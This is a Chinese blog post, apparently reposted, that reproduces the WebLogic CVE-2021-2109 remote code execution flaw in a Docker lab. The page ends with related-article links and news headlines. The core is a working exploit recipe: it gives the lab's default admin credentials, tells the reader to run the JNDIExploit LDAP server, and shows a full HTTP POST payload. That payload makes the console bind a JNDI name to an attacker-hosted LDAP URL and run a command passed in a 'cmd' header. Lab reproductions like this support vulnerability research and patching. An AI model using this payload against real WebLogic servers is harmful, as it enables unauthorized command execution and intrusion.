Weblogic Server远程代码执行（CVE-2021-2109 ）复现

其他 2021-02-01 10:54:36 阅读次数: 0

影响版本

WebLogic 10.3.6.0.0

WebLogic 12.1.3.0.0

WebLogic 12.2.1.3.0

WebLogic 12.2.1.4.0

WebLogic 14.1.1.0.0

环境搭建

这里使用docker来搭建环境

docker pull ismaleiva90/weblogic12

docker run -d -p 49163:7001 -p 49164:7002 -p 49165:5556 ismaleiva90/weblogic12:latest

访问http://your-ip:49163/console即可看到页面

User: weblogic

Pass: welcome1

登陆进去

漏洞复现

启动LDAP

下载地址：

https://github.com/feihong-cs/JNDIExploit/releases/tag/v.1.11

java -jar JNDIExploit-v1.11.jar -i 192.168.204.131

POC:

POST /console/consolejndi.portal?_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.204;131:1389/Basic/WeblogicEcho;AdminServer%22) HTTP/1.1

Host: 192.168.204.131:49163

User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

cmd:id

Cookie: ADMINCONSOLESESSION=nM8lXW3nshhqyFuWs47qjIiQP0tUMtRYRHbBUFDXA8QIxRpdyNqr!964275826

Upgrade-Insecure-Requests: 1

构建数据包并发送

成功执行命令

修复建议

升级到安全版本

猜你喜欢

转载自blog.csdn.net/xuandao_ahfengren/article/details/112974109

Weblogic Server远程代码执行（CVE-2021-2109 ）复现

CVE漏洞复现-CVE-2021-2109 Weblogic Server远程代码执行

Weblogic Server远程代码执行漏洞（CVE-2021-2109 ）复现

【漏洞复现】WebLogic Server 远程代码执行漏洞(CVE-2021-2109)

Weblogic LDAP 远程代码执行漏洞 CVE-2021-2109

【漏洞复现】WebLogic Server 远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389)

Weblogic反序列化远程代码执行漏洞(CVE-2018-2628) 复现

WebLogic 任意文件上传远程代码执行_CVE-2018-2894漏洞复现

复现weblogic CVE-2018-2628

Weblogic(CVE-2017-10271)漏洞复现

WebLogic漏洞复现（CVE-2018-2894）

weblogic----CVE-2017-10271漏洞复现

weblogic(CVE-2018-2628漏洞复现)

Weblogic_CVE-2019-2725复现

CVE-2018-2894 WebLogic远程上传漏洞复现

weblogic漏洞复现

weblogic ssrf漏洞复现

weblogic漏洞总结复现

Weblogic漏洞复现——XML Decoder（CVE-2017-10271）

漏洞复现 CVE-2018-2894 weblogic文件上传

Weblogic管理控制台未授权远程命令执行漏洞复现（cve-2020-14882/cve-2020-14883）

WebLogic反序列化漏洞复现+利用工具(CVE-2021-2394)

CVE-2021-21972Vmware远程代码执行漏洞复现

Laravel 远程代码执行漏洞(CVE-2021-3129)复现

Weblogic wls9_async_response 反序列化远程命令执行漏洞（CVE-2019-2725）复现

WebLogic T3 协议反序列化远程命令执行(CVE-2020-2883)复现

漏洞复现 - Weblogic 反序列化命令执行漏洞（CVE-2018-2628）

weblogic未授权访问命令执行复现（cve-2020-14882）

漏洞复现｜Weblogic反序列化命令执行漏洞(CVE-2018-2628)

WebLogic WLS组件漏洞复现

今日推荐

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

GCC 14.1 发布

周排行

NEFU 117 素数个数的位数

Closest Common Ancestors (Lca,tarjan)

ELK部署

【转载】Hive笔记整理（三）

SQL语句（一）基本表的定义

关于Java web开发中的MySQL的事务语句

MFC创建自定义窗体

如何用一句话激怒程序员？

《逆袭大学》文摘——9.4 基础和应用的平衡中找到大学的节奏

【spring源码分析】@Value注解原理

每日归档

更多

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)

2024-05-04(7)

2024-05-03(19)

2024-05-02(0)